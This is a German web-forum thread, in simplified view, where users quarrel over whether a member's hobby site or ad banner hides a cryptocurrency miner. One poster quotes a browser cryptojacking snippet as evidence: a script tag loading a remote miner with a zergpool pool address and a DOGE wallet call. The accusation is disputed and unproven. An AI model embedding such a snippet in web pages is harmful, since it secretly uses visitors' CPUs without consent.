Shimly Forum

Normale Version: [geteilt] Warnung vor surfhits24 und moneybar24
Du siehst gerade eine vereinfachte Darstellung unserer Inhalte. Normale Ansicht mit richtiger Formatierung.
Seiten: 1 2
Popcorn für alle, tja was Scripte so alles können *g*

Aber lustig ist eure Unterhaltung auf alle Fälle.
(15.04.2025, 16:12)Laemmi schrieb: [ -> ]Popcorn für alle, tja was Scripte so alles können *g*

Aber lustig ist eure Unterhaltung auf alle Fälle.

Das du dein Hirnlosen Senf dazugeben musst ist klar hast überhaupt Ahnung?
Gleich eine Unterstellung das es ein Script ist!!!

Beobachte dich eh schon eine weile über alle in den Shoutboxen beschwerren aber schau mal deine Billige Seite an!
Die du überall buchen tust mit Versteckenten Mining!!!

Sowas z.B.
<script src="https://thelifewillbefine.de/karma/karma.js?karma=bs?algy=flex/native?nosaj=flex.eu.mine.zergpool.com:6435" ></script>
<script type="text/javascript">
EverythingIsLife(' DDGF........................ ', 'c=DOGE', 100);
</script>
@NeonTonic, hast du die Teesorte gewechselt? Ich glaub das Zeug ballert dir zu derb rein.
Wo buche ich was mit Mining? Das Beispiel was du gepostet hast, hat ja mal reinweg garnichts mit mir zu tun. Ich hab lediglich eine Hobbypage wo ein einziger Werbebanner drauf ist und sonst garnichts.
Da sollte ich ja fast über eine Anzeige nachdenken, wegen deiner Unterstellung!
LG
(15.04.2025, 18:16)Laemmi schrieb: [ -> ]@NeonTonic, hast du die Teesorte gewechselt? Ich glaub das Zeug ballert dir zu derb rein.
Wo buche ich was mit Mining? Das Beispiel was du gepostet hast, hat ja mal reinweg garnichts mit mir zu tun. Ich hab lediglich eine Hobbypage wo ein einziger Werbebanner drauf ist und sonst garnichts.
Da sollte ich ja fast über eine Anzeige nachdenken, wegen deiner Unterstellung!
LG

Ne die Teesorte war gut ;o)
Dann schau mal Quellcode bei deinen Werbebanner dann weißt bescheid.

Ach und bitte überlege nicht zu lang wegen Anzeige, weil ich dir was unterstell ist schon sehr komisch wie die Leute hier austeilen Können aber nicht einstecken und gleich mit Anzeige kommen, ist ganz großen Kino.

Zum glück ist Bald Ostern und Ihr habt alle mal zeit Eier zu suchen da euch Anscheind keine gewachsen sind :o)
Bruder ich such seit Wochen Ostereier und hab schon richtig viele gefunden.
Natürlich schaute ich mir den Quellcode an, nochmal du verwechselst was! Bist du dir sicher, dass du überhaupt von meiner Seite redest?
(15.04.2025, 18:37)Laemmi schrieb: [ -> ]Bruder ich such seit Wochen Ostereier und hab schon richtig viele gefunden.
Natürlich schaute ich mir den Quellcode an, nochmal du verwechselst was! Bist du dir sicher, dass du überhaupt von meiner Seite redest?

Also ich Spreche von der Seite https://ueei-lose.de/ hatte mich da nur interessiert warum die CPU da immer hoch ging, habe ich mir da mal den Quellcode angeschaut ist zwar schon bisschen her aber ich habe sogar noch den Screen da den ich als Beschwerte an das Netzwerk geschickt habe.
Screenshort

PS: Irgend wie habe ich heute Lust noch andere Sachen auf zu decken von anderen Nutzern aber lieber nicht mach ich nach Ostern als kleines Oster Geschenk für die Shimly Welt :o)
Na super, jetzt hats mich vor lachen aus meinem gemütlichen Computerstuhl gehauen. Herrlich, Bruder ich sags doch dein Tee ist nicht gut. Ich zieh mir gern mal Kamille rein, auch Fenchel ist sehr bekömmlich.
Lastdodo hinter Twitter, allein die Stelle ist köstlich.
Komm hör auf mit dem Mist. Hat dein Screen deine verstorbene Oma gebastelt?
Ihr dürft gerne auf meine Page gehen und euch den richtigen Quellcode ansehen.

Kindergarten
Ingwertee ist am besten (Geheimtip)
@Stulle, jep ich hab noch Ingwer-Kurkuma hier. Wäre auch was für den Neontypen, dann würde er solchen gefälschten Mist nicht posten.
(15.04.2025, 19:10)Laemmi schrieb: [ -> ]Na super, jetzt hats mich vor lachen aus meinem gemütlichen Computerstuhl gehauen. Herrlich, Bruder ich sags doch dein Tee ist nicht gut. Ich zieh mir gern mal Kamille rein, auch Fenchel ist sehr bekömmlich.
Lastdodo hinter Twitter, allein die Stelle ist köstlich.
Komm hör auf mit dem Mist. Hat dein Screen deine verstorbene Oma gebastelt?
Ihr dürft gerne auf meine Page gehen und euch den richtigen Quellcode ansehen.
Kindergarten

Wenn du meinst das es gefälscht ist und mir das noch unterstellen tust müsste ich jetzt mal wegen einer Anzeige nach denken oder wegen Unterstellung.

Ach und zu Lastdodo (hinter Twitter, allein die Stelle ist köstlich.) die Stelle ist ja immer noch im Quellcode oder soll ich davon auch noch ein screen posten das einzige was ist der Miner ist raus.
https://www.perplexity.ai/search/was-ist...GGZjX9uapA

Für mich ist das Thema beendet, da es ja immer wieder Nutzer gibt die dann der Meinung sind die anderen sind die bösen oder fälschen irgend etwas aber haben nicht die Eier die Wahrheit zu sagen!
Seiten: 1 2